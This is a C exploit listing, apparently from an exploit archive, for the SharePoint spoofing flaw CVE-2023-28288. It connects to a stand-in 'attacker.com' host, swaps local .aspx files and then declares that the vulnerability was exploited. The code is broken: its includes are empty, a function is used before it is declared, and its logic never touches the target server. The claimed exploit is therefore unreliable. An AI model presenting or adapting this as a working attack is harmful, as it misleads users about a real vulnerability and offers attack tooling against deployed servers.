// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : Remote // Vendor Homepage: // Microsoft SharePoint Foundation 2013 Service Pack 1 // Microsoft SharePoint Server Subscription Edition // Microsoft SharePoint Enterprise Server 2013 Service Pack 1 // Microsoft SharePoint Server 2019 // Microsoft SharePoint Enterprise Server 2016 // Tested on: Windows/Linux // CVE : CVE-2023-28288 #include #include // The vulnerable SharePoint server URL const char *server_url = "http://example.com/"; // The URL of the fake SharePoint server const char *fake_url = "http://attacker.com/"; // The vulnerable SharePoint server file name const char *file_name = "vuln_file.aspx"; // The fake SharePoint server file name const char *fake_file_name = "fake_file.aspx"; int main() { HANDLE file; DWORD bytes_written; char file_contents[1024]; // Create the fake file contents sprintf(file_contents, "

This is a fake file.

"); // Write the fake file to disk file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating fake file: %d\n", GetLastError()); return 1; } if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) { printf("Error writing fake file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Send a request to the vulnerable SharePoint server to download the file sprintf(file_contents, "%s%s", server_url, file_name); file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating vulnerable file: %d\n", GetLastError()); return 1; } if (!InternetReadFileUrl(file_contents, file)) { printf("Error downloading vulnerable file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Replace the vulnerable file with the fake file if (!DeleteFile(file_name)) { printf("Error deleting vulnerable file: %d\n", GetLastError()); return 1; } if (!MoveFile(fake_file_name, file_name)) { printf("Error replacing vulnerable file: %d\n", GetLastError()); return 1; } // Send a request to the vulnerable SharePoint server to trigger the vulnerability sprintf(file_contents, "%s%s", server_url, file_name); if (!InternetReadFileUrl(file_contents, NULL)) { printf("Error triggering vulnerability: %d\n", GetLastError()); return 1; } // Print a message indicating that the vulnerability has been exploited printf("Vulnerability exploited successfully.\n"); return 0; } BOOL InternetReadFileUrl(const char *url, HANDLE file) { HINTERNET internet, connection, request; DWORD bytes_read; char buffer[1024]; // Open an Internet connection internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (internet == NULL) { return FALSE; } // Connect to the server connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (connection == NULL) { InternetCloseHandle(internet); return FALSE; } // Send the HTTP request request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); if (request == NULL) { InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } // Read the response data while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) { if (file != NULL) { // Write the data to disk if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } } } InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return TRUE; }